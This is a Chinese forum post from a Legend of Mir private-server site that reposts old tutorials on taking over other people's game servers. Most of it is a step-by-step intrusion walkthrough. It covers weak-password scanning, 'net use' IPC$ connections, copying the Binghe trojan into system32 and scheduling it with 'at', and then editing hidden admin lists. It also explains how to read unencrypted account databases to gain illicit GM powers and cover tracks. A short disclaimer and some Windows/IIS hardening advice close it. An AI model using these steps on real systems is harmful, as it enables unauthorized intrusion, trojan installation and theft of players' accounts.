热点推荐

小喇叭+ 发布

01-16 02:17
01-16 02:04
01-13 17:30
查看: 751|回复: 0

[脚本示例] 一些SF为什么存在非法GM的真正原因

[复制链接]
avatar

签到天数: 350 天

[LV.8]以坛为家I

7651

主题

255

回帖

31万

积分

司徒主管

Rank: 20Rank: 20Rank: 20Rank: 20Rank: 20

UID
1
司徒币
260203
传世币
3000
元宝
0
在线时间
266 小时

最佳新人灌水之王

QQ
online_admin 发表于 2021-12-8 07:21:53 | 显示全部楼层 |阅读模式
些SF为什么存在非法GM的真正原因~ www.sfmir2.com
下面是怎么做非法GM而不在GM文件里表现出来,也不是什么后门的问题,请看转帖,希望大家严加防范~如何在别人的做GM????www.sfmir2.com
攻击初级教学 www.sfmir2.com
我在侵入别人4f所使用的方法  copyright dedecms
看到有些4f做的不错,但是进去又不是很有钱,也没装备,高手也很多,一直不喜欢在里面当菜鸟的我,一口气进入他们的端大闹一番之后。当足了gm的瘾,现在我把方法公布与大家。。。。 dedecms.com

其实我所使用的方法很简单,只有4个工具:  织梦好,好织梦

(一):shed.exe  织梦内容管理系统

(二)流光2000  织梦内容管理系统
(三)cmd.exe (其实就是2000下的dos啦)!  copyright dedecms

(四)冰河8.4 操作系统:win2000 server 或者winxp系统。 “shed.exe”:其实就是用来网上查共享资源的,速度快,可以查到很多服务断的共项文件,不过在这里面有些ip在浏览器中无法访问,这是因为其中也包含了个人上网的ip.呵呵!一些作,网吧的一些目录都是共享的,有些是可以访问,但是不能删除,因为你所访问的都是以匿名访问的,所以权限不够!有些需要密码。遇到密码怎办?用流光! “流光”虽说对202作了限制,但是对小日本的ip可是没有限制的,呵呵!所以说使用流光的ipc探测,建立一个空对话,查到用户列表,然后先简单探测,此时有些网管懒惰,把administrator设置的过于简单,呵呵,你就可以抓到了。 内容来自dedecms
下一步如何做呢?也许在你查对方的端口时发现对方开的端口很少,比如ftp没开,怎办呢?冰河! “冰河”,想必许多朋友都玩过,使用冰河控制一台服务器速度很快,(因为那边带宽很大)几分钟就可以查到对方主机的主页所在位置。但是如何上传并且控制他呢? “cmd.exe” 是2000下的dos了,执行cmd.exe 使用net命令, 本文来自织梦
具体操作如下: 内容来自dedecms
第一步:net use \ipipc$ “password” /user:”user” 说明:以一个超级用户名与你想黑的网站建立联接,当然超级用户必须是该admin里的。这里的”ip”就是主机了,“password”就是超级用户的密码,“user”就是超级用户。比如:net use \210.248.250.2ipc$ “maozhiie” /user:"maozhijie" 内容来自dedecms

第二步:copy g-server.exe \ipadmin$system32 说明:g-server.exe就是冰河的远程端。意义:将此文件拷贝到对方的主机winnt里的system32目录里。也许有人要问木马侵入对方那边可以察觉出来的吧,呵呵!装了估计可以,不过很多主机没钱买呀!不像中国盗版满天飞!如果你有最新的木马也可以的!这是最好的了!!嘿嘿……  织梦好,好织梦
第三步:net time \ip 察看对方的服务器时间。由于有时差,应该是一个小时吧!所以必须要以对方的时间为准。  本文来自织梦
第四步:at \ip time g-server.exe 这里的time就是对方的主机时间。作用:在规定时间执行该程序。比如 at \210.248.250.2 19:55 g-server.exe 第五步:冰河就可以控制该电脑了。这个我就不说了吧,呵呵!菜鸟也会玩的软件。 织梦内容管理系统
这时我们就可以控制了, dedecms.com

net use * \ip*$ 远程映射 本文来自织梦
看这个www.sfmir2.com
dedecms.com
mir.db里面有每个人的数据,并且没加密的,大家可以用www.sfmir2.com
access找开来改一下,改几个极品,如0-80攻的木剑啊,0-50魔的六角戒指之类的,那就随你的便了。只是这样也太烦人了。呵呵。www.sfmir2.com
比如武器,数据格式如下(全部是16进制)www.sfmir2.com
** ** ** ** ce 00 43 12 88 13 01 02 03 04 05 06 07 08 09 00 00 0a www.sfmir2.com
前面**的是物品代码,然后0xce 00 是武器代码(高位在后),和物品db数据库中对应,www.sfmir2.com
例:物品数据库中屠龙是序号(idx)是205,对应到这里就是(205+1)转为16进制是ce www.sfmir2.com
后面的 43 12是当前持久度,88 13是最大持久度。www.sfmir2.com
例:43 12换算成十进制为17170,持久度为17www.sfmir2.com 织梦好,好织梦

后面的01 02 03依次是攻击、魔法、道术。www.sfmir2.com
注意是在原武基础上增加。www.sfmir2.com
例:上面的屠龙显示出来是攻击:5-36,道术:0-2,魔法:0-3。www.sfmir2.com
后面的04 05 06 07 08 09依次是武器的 幸运、诅咒、准确、攻击速度、强度。www.sfmir2.com
后面两个空位后紧跟的0x0a是表示武器是否被修炼,具体来说www.sfmir2.com
给武器加攻击时:www.sfmir2.com
修炼前:00www.sfmir2.com
修炼后:0awww.sfmir2.com
试验成功后:00,攻击值增加。www.sfmir2.com
对于首饰和衣服,自己研究吧,这有好多人都知道的吧,我没细写。网上这方面的文章是有的,我就不用多说了吧?www.sfmir2.com
然后到,|mirservermud2logsrviddb下www.sfmir2.com 织梦好,好织梦

这里有个id.db所有人的帐号和密码都在了,你看着办吧,不过偷人家的号也不是什么光荣的事,我是从来不做的,只是常常会拿gm的号来reload一下。呵呵 织梦内容管理系统
这里,我把你边走边看加到这个的adminlist,呵呵,这里是打个比方,这里加入你的名字),然后,我们到mir.db中找出gm的帐号,再到id.db中找出这个帐号的密码。好了,ok了,用gm号进入(进之前m一下他啊,不要让人家发现了,也不要改人家的密码,让人家发现了多不好啊,呵呵)。打命令@reloadadmin。立刻out吧。www.sfmir2.com
然后,把你加入adminlist的人物从adminlist里删除,好了,你进去吧,你是gm了,可是真正的gm是不会从端看到你的名字呢!!他也许在想“这里怎么了啊?好像还有个gm???”。呵呵,不过不要过火了,不然人家一个reload你的权限就没了啊。www.sfmir2.com
到这里大家做gm的梦就完成了,下面我说的就是怎么远程控制主机了,比如给他关机啊重启啊····www.sfmir2.com
copyright dedecms
我是一点都不懂。不过方面还是略懂一二哦!www.sfmir2.com
入侵主要*的是帐号与密码。大家要先明白什么是系统帐号。什么是系统密码!www.sfmir2.com
其它WINDOWS每一个系统都有着他的超级管理员帐号与密码!www.sfmir2.com
一但这些被到的话,哪么你将会得到一个恐怕的威胁!www.sfmir2.com
当你是人气高的时候。给入侵的话,哪要是万一给删了数据。到时候。真的是惨不忍堵。www.sfmir2.com
一:了解一下帐号的含义www.sfmir2.com
先运行CMDwww.sfmir2.com
然后输入:net user(回车健)www.sfmir2.com
这样后,会显示一例帐号www.sfmir2.com
再查看管理员帐号www.sfmir2.com
输入:net localgroup administratorswww.sfmir2.com 本文来自织梦
这就是查看administrators组的用户。这样的话若是人家用隐藏帐号的方法也会查出来!www.sfmir2.com
系统自带的超级管理员帐号是administratorwww.sfmir2.com
记住这里显示出来多个帐号不明的帐号。哪就证明你机器不了。若出现在的帐号都是你自已的帐号。哪百分之四十你机器未被入侵www.sfmir2.com
帐号:www.sfmir2.com
二:密码篇www.sfmir2.com
你若觉得自已的帐号密码是123456哪么不出三秒人家就到你机上一游了。www.sfmir2.com
修改密码方法,在DOS下修改更www.sfmir2.com
输入net user 帐号名 需修改密码(然后回车健)www.sfmir2.com
一般密码设复杂一点! www.sfmir2.com
copyright dedecms

溢出:www.sfmir2.com
2000版装下去会自动装IIS的,若你觉得IIS没有什么用就停止。IIS地址:开始》》程序》》管理工具》》Internet信息服务(这个就是IIS)你将他开启。上面按停止!这样就进一步了。不过若IIS你需要用的话,哪么记得打目前最新的补丁SP4哦。 copyright dedecms

RPC溢出。大家记住,试试telnet IP 135看看有没有开着。若是开着。请打RPC补丁。若找不到。干脆装个,将135端屏蔽! 内容来自dedecms

大家千万要记住。入侵系统最关点的就是要帐号密码。保护好自已帐号与密码。一定属于你!www.sfmir2.com
本文引起广大4f拥有者的注意www.sfmir2.com
入侵/充当非法GM。www.sfmir2.com
首先,我得声明,我写本文并不是教大家如何去黑4f,只是想以本文引起广大4f拥有者的注意www.sfmir2.com
,提高自己的网管水平。www.sfmir2.com
我爱玩,但却玩得很菜,也没有时间去玩,只想玩着过瘾,所以,当我开始玩时,www.sfmir2.com
虽觉得是好玩,但玩盛大的简直是在受罪,升级慢,没好装备,处处受人欺负。所以,4f是明www.sfmir2.com
智的选择,但进去时也没有好装备,也是受人欺负,难道我不可以做gm?试试,folling me!www.sfmir2.com 织梦好,好织梦

找来一大堆4f的ip,开个x-scan扫吧。有了,还真不少,都是弱口令的,这些网管真菜呀。www.sfmir2.com
选好一个,192.168.0.1,go!www.sfmir2.com
打开cmd,www.sfmir2.com
1)c:/>net use 192.168.0.1ipc$ "" /user:administratorwww.sfmir2.com
连接成功,www.sfmir2.com
ok,连上了,成功在望,www.sfmir2.com
2)c:/>copy 192.168.0.1d$mirservermir200enviradminlist.txtwww.sfmir2.com
系统找不到指定的文件。www.sfmir2.com
没有?不可能吧?唔,一定是隐藏了,没关系,再来,www.sfmir2.com
3)c:>attrib -r -h 192.168.0.1d$mirservermir200enviradminlist.txtwww.sfmir2.com
没有提示,成功了,www.sfmir2.com
这次连复制也不用了,直接改吧,www.sfmir2.com 内容来自dedecms
4)c:>edit 192.168.0.1d$mirservermir200enviradminlist.txtwww.sfmir2.com
会打开个介面,看看里面有哪些gm,加个吧,自己记得就行了,改完保存退出www.sfmir2.com
5)c:>attrib +r +h 192.168.0.1d$mirservermir200enviradminlist.txtwww.sfmir2.com
把adminilist.txt还原成只读隐藏,www.sfmir2.com
好了,大功告成,快打扫脚印吧,别让人发现被入侵了,www.sfmir2.com
现在,就等着系统重启了,等不及的话就在第五步让它重启,不过这样太危险了,还是等吧www.sfmir2.com
www.sfmir2.com
第二天注册个帐号,新建个之前加的人名进去,www.sfmir2.com
/whowww.sfmir2.com
当前150人在线www.sfmir2.com
哈,我就是gm了。赶快把自己升级,www.sfmir2.com 本文来自织梦
@level -1www.sfmir2.com
升级成功,255级,哈哈www.sfmir2.com
再造出想要的装备,想要什么尽情造吧,www.sfmir2.com
重复上面的把自己从adminlist.txt里删了,哈哈,好装备到手了,可以玩了 本文来自织梦
面记得有位朋友对加强对服务器性的解决方法进行了一系列的说明,讲得非常详细,但是我觉得还有很多需要补充的地方.微软的系统是漏洞和补丁著称,真正要对的配置确实非常困难,考虑的方面也太多了.www.sfmir2.com
今天先讲一个方面的内容了,也算是对前面的朋友的进一步补充吧!www.sfmir2.com
前面那位朋友所概述的主要是针对WIN2000系统弱口令的设置!他已经说得很仔细了,做到那些,口令这一关差不多了.确实在互联网的时代,口令真的非常重要.我对国外的主机进行了一系列的测试,就拿有弱口令的系统来说,还有不少!其中也包括了不少中小型企业的WEB服务器,E-MAIL,PROXY都有这种低级的错误!www.sfmir2.com
如果说你在这方面做得非常的仔细.但你至少还要仔细研究一下你主机现在所运行的有哪些服务,这些服务代表着什么?你应该很清楚!因为现在软件,木马工具,远程控制软件大多是以一种服务的形式运行在你的服务器系统里,一般的,杀毒软件对其并没有任何反映的.对于服务形式出现的控制工具.比较难得发现,所以你就必须在里运行的哪些服务非常熟悉.对于陌生或奇怪的服务应该设置好.www.sfmir2.com 织梦内容管理系统

下面我都WIN2000的WWW(IIS)配置略讲一下,WWW服务在WIN2000SERVER,ADSERVER,DATACENTERSERVER,中是默认安装的,如果你不需要用2000的WWW服务的话,建议不要安装.至于添加/删除你可以控制面板的去掉他的安装,或者在"管理工具"/"服务"里设置WORD WIDE WEB SERVICE"启动类型为"手动/禁用"www.sfmir2.com
这样的话系统就不默认启动改服务!www.sfmir2.com
如果你需要用IIS来建站宣传一下自己的,你就必须按以下方法配置好IIS,www.sfmir2.com
在IIS组件你首先要去掉你不需要的SMTP,SNNP,FTP,这样的话你可以降低你运行所占用的CPU资源,和内存使用率.然后建议你删除你C:INTERPUB目录下的所有内容!或者更改路径.在IIS管理器中删除默认站点,(或者删除SCRIPTS这个虚拟目录)因为这个目录有可写的权限的.在新建的WEB站点中,设置IIS的权置,必须让它不能写入,或运行.因为IIS是默认支持ASP脚本的.然后在IIS中删除不需要的映射,这个很重要.如果你要支持PHP,CGI脚本的话,你还得配置好PHP.CGI的应用程序的正确映射,禁用或删除FSO组件,(去年深圳之窗就是被人家利用FSO黑了......)如果你要使用FSO的话,最好要改名!否则的话,你给别人提供主页上传的话,你肯定是会被黑的.小心呀!www.sfmir2.com copyright dedecms

目前在横行的互联网空间中,利用IIS的漏洞,提申自己的权限,而成为AD,这些只是轻而易举的事情,这不需要花几天的时间去暴力破解一下口令,像自己架设的WEB有种情况,更是数不甚数了.关于怎利用UNICODE漏洞去提供AD权限的文章,网上太多了,我就不多讲了.www.sfmir2.com
这些来说应该是服务器安全防范方面的一个例子而已,真正要做到服务器的运行,需要你花大量的时间去摸索.因为这些来说,足以应付一些无聊的.....当然了,你如果需要WEB,我还是建议你去使用AP了.他的源代码开发,免费,性稳定性都比IIS强得多了.www.sfmir2.com
如果你还有许多要和我讨论的问题,可以直接与我联系了.到于LINUX的性问题,AP的问题,2000的一些防黑措拖,以及反黑,跟踪攻击,对付DDOS的问题都可以与我讨论,想说的话实在太多,但...... 织梦内容管理系统

帖子地址: 





上一篇:翎风M2.NPC名字变色的设置方法
下一篇:增加新书的方法
回复

使用道具 举报

懒得打字嘛,点击右侧快捷回复 【乱回复灌水将给予禁言处理】
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则